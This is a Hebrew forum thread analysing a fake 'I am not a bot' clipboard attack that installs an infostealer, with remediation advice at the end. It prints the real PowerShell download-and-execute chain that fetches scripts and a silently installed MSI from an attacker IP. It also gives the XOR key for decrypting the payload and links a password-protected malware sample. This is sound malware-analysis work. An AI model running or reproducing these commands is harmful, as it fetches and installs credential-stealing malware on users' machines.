שיתוף | בואו נהנדס לאחור וירוס (שימו לב לא להוריד קבצים משרשור זה)
-
שימו לב בשרשור זה מובאים קבצים מסוכנים! נלקחו לא מעט צעדים כדי לסננם ולהגן עליהם מפני הורדה מוטעת
אך עדיין חובת האזהרה כאן
בהמשך לשרשור הזה, הבאתי כאן את עיקרי הדברים ממה שעברתי על הוירוס.
אז בואו נעשה סדר בתהליך התקיפה, שלב אחר שלב.
שלב 1: ההדבקה/ההידבקות הראשונית.
הכל מתחיל כשהקורבן מתבקש באתר לאמת את זהותו על ידי הדבקת פקודה לחלון
Win + R.
|הפקודה הזאת זה ההתחלה:
powershell -wi mi (.'powershell' (. 'wget' -usebas '84.21.189.171:5506/clo.txt'));I am not a bot - Verification ID: #8626 )הפקודה הזו מריצה PowerShell בחלון מוסתר (
-wi mi) ומורידה ומפעילה תוכן מקובץclo.txtמהשרת של התוקף.בתוך הקובץ
clo.txtאנו מוצאים את הקוד הבא:$u='http://84.21.189.171:5506/wir.txt' $i='Invoke-WebRequest' $e='Invoke-Expression' $r=& $i -Uri $u -UseBasicParsing & $e $r.Contentהסקריפט הזה פשוט מוריד ומריץ את השלב הבא בשרשרת: הקובץ
wir.txt.
הקובץwir.txtמכיל את הקוד הסופי של שלב ההדבקה:&{$u='http://84.21.189.171:5506/JDYQAKRR.msi';$p="$env:TEMP\s$(Get-Random).msi";(New-Object Net.WebClient).DownloadFile($u,$p);Start-Process msiexec.exe -Args @('/i',"`"$p`"",'/qn','/norestart') -WindowStyle Hidden -Wait;Remove-Item $p -Force}הסקריפט הזה מוריד קובץ
JDYQAKRR.msiלתיקיית ה-TEMP תחת שם אקראי, מתקין אותו בשקט (/qn) ובחלון מוסתר, ואז מוחק את קובץ ההתקנה כדי לטשטש עקבות.
עכשיו אנחנו מגיעים לחלק עם הבשר הווירוס עצמו.שלב 2: במבט מלמעלה
הנה הקובץ בשביל מי שרוצה, סיסמה
infected
malware_sample.msi.7zזהירות קובץ מסוכן!!
לאחר חילוץ ה-MSI, מתגלה לנו מבנה התיקיות הבא:
msi-extracted │ malware_sample.msi │ └───Layperson Cieg.keac Croort.jga D_Droid.exe mfc110u.dll MSVCP110.dll MSVCR110.dll sciter32.dll zpsres.US.dllמה שישר תופס את תשומת הלב זהו הקובץ
D_Droid.exe. החשד המיידי נפל עליו.
העלאתו ל-VirusTotal מגלה שהוא חומק בקלות רבה מאנטי-וירוסים שונים. דבר מדאיג ומזר בהחלט (לפחות בהווא אמינא).עכשיו ביליתי לא מעט זמן עובר על הקובץ מוצא לופים של הצפנה והרגשתי קרוב,
למרות זאת לא מצאתי שום דבר אמיתי ממה שחיפשתי לא הרצה של payload לא קריאות מוזרות לשרתים, כלום.בנוסף על כול זה גם virustotal החזיר בדיקה נקייה,
בשלב הזה בדקתי את הפרטים של הקובץ וראיתי להפתעתי שהקובץ חתום ומסתבר שהוא איננו זדוני.
כך שסתם ביזבזתי את הזמן עליו (נלמד להבא...)למעשה מבדיקה קלה של הקובץ אנחנו יכולים לראות שיש לנו עסק
עם תוכנה חתומה ורגילה בשםZoner Photo Studio 18אז אחרי כול זה (שמסתבר שעקבתי אחרי המפתחות רישיון של התוכנה במקום את של הוירוס).
צריך להבין אז מה קורה כאן בעצם?שלב 3: אז איפה הוירוס נמצא?
עכשיו ששללנו את הexe,
מה שהוביל אותי למסקנה שהוירוס טמון כנראה בדבר שנקרא dll swapping (החלפת dll)
בעיה שמשפיעה גם בוירוסים וגם תוקפת בחוזקה כאשר מפתחים קיוסק תורני.כלומר יש קובץ dll זדוני בתוך הקבצים שלנו שמתחזה לאחד מהקבצים הרגילים כך
שברגע שהתוכנה קוראת לו הוא נכנס לפעולה ומפעיל את השלב הבא של הוירוס,
זה אומר שיש כאן מתחזה, השאלה היא רק מי הוא.בהסתכלות על מערכת הקבצים אנחנו יכולים לראות מספר דברים:
MSVCP110.dll,MSVCR110.dll: קבצי סביבת ריצה סטנדרטיים של ++C (MFC ו).sciter32.dll: ספרייה לרינדור ממשקי משתמש מבוססי HTML.zpsres.US.dll: קובץ משאבים של התוכנה. (וגם מכיל תמונה מוזרה של תוכי משום מה!
)mfc110u.dll: זהו קובץ השייך לספריית MFC של מיקרוסופט. שבמבט ראשון נראה תקין, אבל בבדיקה מעמיקה יותר, מתגלה שהקובץ אכן חתום אבל פגום, והחתימה שווה כקליפת השום.
למעשה גיליתי שהחתימה שלו לא תקפה רק בשלב יותר מאוחר אבל השארתי את זה כאן כדי לשמור על סדר
- יש את שני הקבצים
Croort.jga(21KB) וCieg.keac(2.5mb) שניהם מהסתכלות מלמעלה נראים מוזרים,
הקובץ מחתחיל עם לא מעט מחרוזות טקסט חסרות פשר ואז מגיע למקטע IDAT (מקטע מידע בקובץ Png),
סריקה בbinwalker לא הולידה פירות כך שאנחנו מתעסקים כנראה עם קובץ מוצפן או לא מוגדר (סריקת entropy מראה על נתונים סבירים אבל היא משתנה ברגע שמורידים את כול הטקסט בהתחלה).
מה שמוביל להנחה שהם השלב הבא.
שלב 4: פענוח הPayload
כדי לפענח אותם, יצרתי סקריפט עם ai שסורק קומבינציות הצפנה שונות בחיפוש אחר המחרוזת
http://. הסריקה העלתה שהקבצים "הוצפנו" באמצעות XOR, והמפתח הואF9A7E67E.לאחר הפענוח, קיבלנו קובץ שמכיל בתחילתו את הטקסט המוכר:
"This program cannot be run in DOS mode". זוהי אינדיקציה ברורה שאנחנו מתעסקים עם קובץ הרצה (EXE או DLL וטכנית גם sys). למרות זאת, הקובץ המפוענח עדיין לא מזוהה למרות שסוגרים אותו וכו'.אז עד כאן הגעתי איתרתי לא מעט כתובות שהתוכנה קוראת להם חלקם לא רשומות וחלקם לא זמינות לפחות ממה שניסיתי.
אני ישתדל להמשיך את המחקר בזה מי שרוצה מוזמן להמשיך פה בנושא בהצלחה.
ניתוח הפעילות מתוך vitus total:
ניתוח התנהגותי של הווירוס בסביבה מבוקרת (Sandbox) חושף את היכולות האמיתיות שלו. הנה פירוט הטכניקות שזוהו, לפי מודל MITRE ATT&CK:
קטגוריה (Tactic) טכניקה (Technique) מזהה תיאור Persistence (התמדה) Pre-OS Boot: Bootkit T1542.003 הווירוס משתמש ב- bcdedit.exeכדי לשנות את הגדרות האתחול של Windows, מה שמאפשר לו לרוץ לפני שמערכת ההפעלה עולה במלואה ולהשיג שליטה עמוקה.Privilege Escalation (הסלמת הרשאות) Process Injection T1055 כותב קוד לתוך הזיכרון של תהליכים אחרים (כמו rundll32.exe) כדי להריץ קוד זדוני בהקשר של תהליך לגיטימי.Defense Evasion (התחמקות מהגנות) System Binary Proxy Execution T1218 מריץ DLL זדוני ( sciter.dllבמקרה שזוהה) באמצעות תהליך מערכת לגיטימי כמוrundll32.exeכדי להסוות את פעילותו.Virtualization/Sandbox Evasion T1497 בודק אם הוא רץ בסביבת ניתוח (Sandbox) או תחת Debugger כדי להימנע מגילוי. Impair Defenses T1562 עלול לנסות להשבית או לפגוע בכלי אבטחה קיימים במערכת. Discovery (גילוי) Process Discovery T1057 סורק תהליכים רצים במערכת, כנראה כדי לאתר תהליכי אבטחה או כדי להזריק קוד לתהליכים ספציפיים. Command and Control (שליטה ובקרה) Application Layer Protocol T1071 משתמש בפרוטוקולי רשת סטנדרטיים (כמו HTTP) כדי לתקשר עם שרתי השליטה והבקרה שלו. סיכום
-
זוהי מתקפה די ידועה ודי אפקטיבית,
אם נפלתם בה ההמלצה המידית היא לכבות את המחשב לגבות את כול הנתונים מגרסת live ולפרמט. -
בנוסף יש לשנות את הסיסמאות בכול החשבונות שיש לכם,
ולדאוג להתנתק מהחיבורים הנוכחים שי לכם ליתר ביטחון. -
בנוסף אין להשתמש יותר בסיסמאות שהשתשמתם בהן בכול חשבון שהוא בשעת הפריצה.
או לכול הפחות לא תחת אותה כתובת מייל. -
במידה ואין לכם ידע בנושא יש לפנות לבעל מקצוע.
TL;DR/אמלוק
וירוס infostealer סטנדרטי
אהבתי את איך שהוא הזריק את עצמו יש טיפה fuzzing
לא יודע אם זה עקיצה מכוונת שהשם של התיקייה זה layperson
סך הכול נחמד יש עוד לראות ולבדוק מוזמנים.כתבתי לבד עשית שיפצור לפוסט עם ai
אם יש טעויות זה לא אני
זה הואעריכה: נראה שהוירוס הוא אכן infostealer כולשהוא,
והקבצי payload שפיענחנו הופכים לקובץ exe חתום בסופו של דבר (שזה הרבה כסף)
הקובץ חתום תחת שם של אדם / חברה שכנראה אין להם קשר לעניין חוץ מהועבדה שרשיונם נגנב וכבר משמש מספר פעמים כדי להפיץ וירוסים כאלה,
מבדיקה נראה שזה משמש בכמה תקיפות הרישיון הזה והכול בהקשר של Lume stealer,
(גם במקרה דומה שהובא פה בפורום זה הם בסופו של דבר)בסופו של דבר יוצא קובץ חדש שהוא הוירוס עצמו שעושה את כול מה שתצפו גונב מידע וכו' רק חשבתי להזכיר את זה שזה חתום זה היה מציאה די מעניינת.
להנדס את הוירוס עצמו אולי אני יעשה בעתיד אם אני ימצא לזה זמן או כול אחד אחר מוזמן לעשות את זה.
-
-
אני לא סיימתי אבל סתם משהו מעניין או אולי סתם מוזר.
תוך כדי שינויים שאני עושה לקבצים בניסיון לתקן אותם, אם תנסו לראות את המאפיינים של הקובץ הזה explorer יקרוס.
Repair-Try05-03.exeלפני שקופצים עלי הוצאתי לו את הstub של הדוס בהתחלה, הקובץ לא מסוכן
-
אגב הדיון פה על העתקה והדבקה נזכרתי במאמר הזה
https://internet-israel.com/רשת-האינטרנט/clipboard-api/
החלק הפיקנטי בסוף@צדיק-תמים כתב בשיתוף | בואו נהנדס לאחור וירוס (שימו לב לא להוריד קבצים משרשור זה):
אגב הדיון פה על העתקה והדבקה נזכרתי במאמר הזה
לטענתם טיקטוק מבצעים פעולת הדבקה מהלוח כשהמשתמש לא יודע
זה לא דבר שמצדיק חסימה של טיקטוק?עריכה: קראתי קריאה חפוזה מדיי וזה לא נכון כמו שהעיר @צדיק-תמים
הועתק מהאתר של רן בר-זיק החתיך וההורס!
-
@צדיק-תמים כתב בשיתוף | בואו נהנדס לאחור וירוס (שימו לב לא להוריד קבצים משרשור זה):
אגב הדיון פה על העתקה והדבקה נזכרתי במאמר הזה
לטענתם טיקטוק מבצעים פעולת הדבקה מהלוח כשהמשתמש לא יודע
זה לא דבר שמצדיק חסימה של טיקטוק?עריכה: קראתי קריאה חפוזה מדיי וזה לא נכון כמו שהעיר @צדיק-תמים
הועתק מהאתר של רן בר-זיק החתיך וההורס!
-
@צדיק-תמים לטענת האתר שהבאת
(היה יותר נכון מצדי לכתוב לטענתו ולא לטענתם) -
שימו לב בשרשור זה מובאים קבצים מסוכנים! נלקחו לא מעט צעדים כדי לסננם ולהגן עליהם מפני הורדה מוטעת
אך עדיין חובת האזהרה כאן
בהמשך לשרשור הזה, הבאתי כאן את עיקרי הדברים ממה שעברתי על הוירוס.
אז בואו נעשה סדר בתהליך התקיפה, שלב אחר שלב.
שלב 1: ההדבקה/ההידבקות הראשונית.
הכל מתחיל כשהקורבן מתבקש באתר לאמת את זהותו על ידי הדבקת פקודה לחלון
Win + R.
|הפקודה הזאת זה ההתחלה:
powershell -wi mi (.'powershell' (. 'wget' -usebas '84.21.189.171:5506/clo.txt'));I am not a bot - Verification ID: #8626 )הפקודה הזו מריצה PowerShell בחלון מוסתר (
-wi mi) ומורידה ומפעילה תוכן מקובץclo.txtמהשרת של התוקף.בתוך הקובץ
clo.txtאנו מוצאים את הקוד הבא:$u='http://84.21.189.171:5506/wir.txt' $i='Invoke-WebRequest' $e='Invoke-Expression' $r=& $i -Uri $u -UseBasicParsing & $e $r.Contentהסקריפט הזה פשוט מוריד ומריץ את השלב הבא בשרשרת: הקובץ
wir.txt.
הקובץwir.txtמכיל את הקוד הסופי של שלב ההדבקה:&{$u='http://84.21.189.171:5506/JDYQAKRR.msi';$p="$env:TEMP\s$(Get-Random).msi";(New-Object Net.WebClient).DownloadFile($u,$p);Start-Process msiexec.exe -Args @('/i',"`"$p`"",'/qn','/norestart') -WindowStyle Hidden -Wait;Remove-Item $p -Force}הסקריפט הזה מוריד קובץ
JDYQAKRR.msiלתיקיית ה-TEMP תחת שם אקראי, מתקין אותו בשקט (/qn) ובחלון מוסתר, ואז מוחק את קובץ ההתקנה כדי לטשטש עקבות.
עכשיו אנחנו מגיעים לחלק עם הבשר הווירוס עצמו.שלב 2: במבט מלמעלה
הנה הקובץ בשביל מי שרוצה, סיסמה
infected
malware_sample.msi.7zזהירות קובץ מסוכן!!
לאחר חילוץ ה-MSI, מתגלה לנו מבנה התיקיות הבא:
msi-extracted │ malware_sample.msi │ └───Layperson Cieg.keac Croort.jga D_Droid.exe mfc110u.dll MSVCP110.dll MSVCR110.dll sciter32.dll zpsres.US.dllמה שישר תופס את תשומת הלב זהו הקובץ
D_Droid.exe. החשד המיידי נפל עליו.
העלאתו ל-VirusTotal מגלה שהוא חומק בקלות רבה מאנטי-וירוסים שונים. דבר מדאיג ומזר בהחלט (לפחות בהווא אמינא).עכשיו ביליתי לא מעט זמן עובר על הקובץ מוצא לופים של הצפנה והרגשתי קרוב,
למרות זאת לא מצאתי שום דבר אמיתי ממה שחיפשתי לא הרצה של payload לא קריאות מוזרות לשרתים, כלום.בנוסף על כול זה גם virustotal החזיר בדיקה נקייה,
בשלב הזה בדקתי את הפרטים של הקובץ וראיתי להפתעתי שהקובץ חתום ומסתבר שהוא איננו זדוני.
כך שסתם ביזבזתי את הזמן עליו (נלמד להבא...)למעשה מבדיקה קלה של הקובץ אנחנו יכולים לראות שיש לנו עסק
עם תוכנה חתומה ורגילה בשםZoner Photo Studio 18אז אחרי כול זה (שמסתבר שעקבתי אחרי המפתחות רישיון של התוכנה במקום את של הוירוס).
צריך להבין אז מה קורה כאן בעצם?שלב 3: אז איפה הוירוס נמצא?
עכשיו ששללנו את הexe,
מה שהוביל אותי למסקנה שהוירוס טמון כנראה בדבר שנקרא dll swapping (החלפת dll)
בעיה שמשפיעה גם בוירוסים וגם תוקפת בחוזקה כאשר מפתחים קיוסק תורני.כלומר יש קובץ dll זדוני בתוך הקבצים שלנו שמתחזה לאחד מהקבצים הרגילים כך
שברגע שהתוכנה קוראת לו הוא נכנס לפעולה ומפעיל את השלב הבא של הוירוס,
זה אומר שיש כאן מתחזה, השאלה היא רק מי הוא.בהסתכלות על מערכת הקבצים אנחנו יכולים לראות מספר דברים:
MSVCP110.dll,MSVCR110.dll: קבצי סביבת ריצה סטנדרטיים של ++C (MFC ו).sciter32.dll: ספרייה לרינדור ממשקי משתמש מבוססי HTML.zpsres.US.dll: קובץ משאבים של התוכנה. (וגם מכיל תמונה מוזרה של תוכי משום מה!)mfc110u.dll: זהו קובץ השייך לספריית MFC של מיקרוסופט. שבמבט ראשון נראה תקין, אבל בבדיקה מעמיקה יותר, מתגלה שהקובץ אכן חתום אבל פגום, והחתימה שווה כקליפת השום.
למעשה גיליתי שהחתימה שלו לא תקפה רק בשלב יותר מאוחר אבל השארתי את זה כאן כדי לשמור על סדר
- יש את שני הקבצים
Croort.jga(21KB) וCieg.keac(2.5mb) שניהם מהסתכלות מלמעלה נראים מוזרים,
הקובץ מחתחיל עם לא מעט מחרוזות טקסט חסרות פשר ואז מגיע למקטע IDAT (מקטע מידע בקובץ Png),
סריקה בbinwalker לא הולידה פירות כך שאנחנו מתעסקים כנראה עם קובץ מוצפן או לא מוגדר (סריקת entropy מראה על נתונים סבירים אבל היא משתנה ברגע שמורידים את כול הטקסט בהתחלה).
מה שמוביל להנחה שהם השלב הבא.
שלב 4: פענוח הPayload
כדי לפענח אותם, יצרתי סקריפט עם ai שסורק קומבינציות הצפנה שונות בחיפוש אחר המחרוזת
http://. הסריקה העלתה שהקבצים "הוצפנו" באמצעות XOR, והמפתח הואF9A7E67E.לאחר הפענוח, קיבלנו קובץ שמכיל בתחילתו את הטקסט המוכר:
"This program cannot be run in DOS mode". זוהי אינדיקציה ברורה שאנחנו מתעסקים עם קובץ הרצה (EXE או DLL וטכנית גם sys). למרות זאת, הקובץ המפוענח עדיין לא מזוהה למרות שסוגרים אותו וכו'.אז עד כאן הגעתי איתרתי לא מעט כתובות שהתוכנה קוראת להם חלקם לא רשומות וחלקם לא זמינות לפחות ממה שניסיתי.
אני ישתדל להמשיך את המחקר בזה מי שרוצה מוזמן להמשיך פה בנושא בהצלחה.
ניתוח הפעילות מתוך vitus total:
ניתוח התנהגותי של הווירוס בסביבה מבוקרת (Sandbox) חושף את היכולות האמיתיות שלו. הנה פירוט הטכניקות שזוהו, לפי מודל MITRE ATT&CK:
קטגוריה (Tactic) טכניקה (Technique) מזהה תיאור Persistence (התמדה) Pre-OS Boot: Bootkit T1542.003 הווירוס משתמש ב- bcdedit.exeכדי לשנות את הגדרות האתחול של Windows, מה שמאפשר לו לרוץ לפני שמערכת ההפעלה עולה במלואה ולהשיג שליטה עמוקה.Privilege Escalation (הסלמת הרשאות) Process Injection T1055 כותב קוד לתוך הזיכרון של תהליכים אחרים (כמו rundll32.exe) כדי להריץ קוד זדוני בהקשר של תהליך לגיטימי.Defense Evasion (התחמקות מהגנות) System Binary Proxy Execution T1218 מריץ DLL זדוני ( sciter.dllבמקרה שזוהה) באמצעות תהליך מערכת לגיטימי כמוrundll32.exeכדי להסוות את פעילותו.Virtualization/Sandbox Evasion T1497 בודק אם הוא רץ בסביבת ניתוח (Sandbox) או תחת Debugger כדי להימנע מגילוי. Impair Defenses T1562 עלול לנסות להשבית או לפגוע בכלי אבטחה קיימים במערכת. Discovery (גילוי) Process Discovery T1057 סורק תהליכים רצים במערכת, כנראה כדי לאתר תהליכי אבטחה או כדי להזריק קוד לתהליכים ספציפיים. Command and Control (שליטה ובקרה) Application Layer Protocol T1071 משתמש בפרוטוקולי רשת סטנדרטיים (כמו HTTP) כדי לתקשר עם שרתי השליטה והבקרה שלו. סיכום
-
זוהי מתקפה די ידועה ודי אפקטיבית,
אם נפלתם בה ההמלצה המידית היא לכבות את המחשב לגבות את כול הנתונים מגרסת live ולפרמט. -
בנוסף יש לשנות את הסיסמאות בכול החשבונות שיש לכם,
ולדאוג להתנתק מהחיבורים הנוכחים שי לכם ליתר ביטחון. -
בנוסף אין להשתמש יותר בסיסמאות שהשתשמתם בהן בכול חשבון שהוא בשעת הפריצה.
או לכול הפחות לא תחת אותה כתובת מייל. -
במידה ואין לכם ידע בנושא יש לפנות לבעל מקצוע.
TL;DR/אמלוק
וירוס infostealer סטנדרטי
אהבתי את איך שהוא הזריק את עצמו יש טיפה fuzzing
לא יודע אם זה עקיצה מכוונת שהשם של התיקייה זה layperson
סך הכול נחמד יש עוד לראות ולבדוק מוזמנים.כתבתי לבד עשית שיפצור לפוסט עם ai
אם יש טעויות זה לא אני זה הואעריכה: נראה שהוירוס הוא אכן infostealer כולשהוא,
והקבצי payload שפיענחנו הופכים לקובץ exe חתום בסופו של דבר (שזה הרבה כסף)
הקובץ חתום תחת שם של אדם / חברה שכנראה אין להם קשר לעניין חוץ מהועבדה שרשיונם נגנב וכבר משמש מספר פעמים כדי להפיץ וירוסים כאלה,
מבדיקה נראה שזה משמש בכמה תקיפות הרישיון הזה והכול בהקשר של Lume stealer,
(גם במקרה דומה שהובא פה בפורום זה הם בסופו של דבר)בסופו של דבר יוצא קובץ חדש שהוא הוירוס עצמו שעושה את כול מה שתצפו גונב מידע וכו' רק חשבתי להזכיר את זה שזה חתום זה היה מציאה די מעניינת.
להנדס את הוירוס עצמו אולי אני יעשה בעתיד אם אני ימצא לזה זמן או כול אחד אחר מוזמן לעשות את זה.
@cfopuser כתב בשיתוף | בואו נהנדס לאחור וירוס (שימו לב לא להוריד קבצים משרשור זה):
בעיה שמשפיעה גם בוירוסים וגם תוקפת בחוזקה כאשר מפתחים קיוסק תורני.
בעיה מוכרת אבל ניתנת לפתרון בקלות
בפיתוח נכון יש כמה דרכים לסגור את הפרצה הזאת כמו הגדרת נתיבים מפורשים או בדיקת חתימות לפני שימוש בפונקציות שבו
אולי אתה מכיר תוכנה ספציפית שנפלה בזה אבל אני לא יודע עד כמה קיוסק תורני אמור להיות מוגן ממישהו שיודע לקמפל קבצי dll מקוסטמים - זה אולי אלפית מהאנשים
ואגב השיטה מוכרת יותר כ DLL sideloading
לגבי הקובץ הרצה שמוצפן - אולי הוא במצב mapped? זה מסביר למה הוא קורס כשמנסים לראות את המאפיינים שלו
בכל אופן שאפו ענק
זאת ממש עבודת מחקר רצינית -
כתב בשיתוף | בואו נהנדס לאחור וירוס (שימו לב לא להוריד קבצים משרשור זה):
@מישהו12 השאלה אם באופן אוטומטי כשאתה נכנס לאתר הוא מטמיע לך את הקוד בלוח ההעתקות או שאתה צריך ללחוץ על כפתור העתק או משהו כזה?
?
@אברהם-גלסר כשאתה לוחץ על "אני לא רובוט"...
 { const baseUrl = "https://www.google.co.il/search?q=site:mitmachim.top"; const m = location.pathname.match(/^\/(topic|category)\/(\d+)/); const type = m ? m[1] : null; const id = m ? m[2] : null; let searchInput; function search(path = "") { const query = searchInput.value.trim(); if (query) { window.open(`${baseUrl}${path}%20${encodeURIComponent(query)}`, "_blank"); } } let buttons = {}; buttons.searchAll = { id: "bb-search-all", label: `חיפוש ${type ? "בכל הפורום" : ""}`, className: type ? "btn-secondary" : "btn-primary", callback: () => search(), }; if (type === "topic") { buttons.searchTopic = { label: "חיפוש בנושא זה", className: "btn-primary", callback: () => search(`/topic/${id}`), }; } else if (type === "category") { buttons.searchCategory = { label: "חיפוש בקטגוריה זו", className: "btn-primary", callback: () => search(`/category/${id}`), }; } buttons.cancel = { label: "ביטול", className: "btn-default", "data-bs-dismiss": "modal" }; const dialog = bootbox.dialog({ title: '<div style="text-align:center;"><img src="/assets/uploads/files/1625950269825-mt-google.png" width="400" alt="חיפוש בגוגל"></div>', message: '<input id="bb-inp" class="bootbox-input bootbox-input-text form-control" placeholder="הקלידו כדי לחפש בגוגל" autocomplete="off"/>', buttons, backdrop: true, show: true, onEscape: true }); dialog.on("shown.bs.modal", function () { searchInput = document.getElementById("bb-inp"); if (searchInput) { searchInput.focus(); searchInput.addEventListener("keydown", function (e) { if (e.key === "Enter") { e.preventDefault(); const query = this.value.trim(); if (query) { search(); dialog.modal("hide"); } } else if (e.key === "Escape") { e.preventDefault(); dialog.modal("hide"); } }); } const searchAllButton = document.getElementById("bb-search-all"); if (searchAllButton) { searchAllButton.title = "לחצו על אנטר כדי לחפש"; } }); })(); void 0;){kind=link}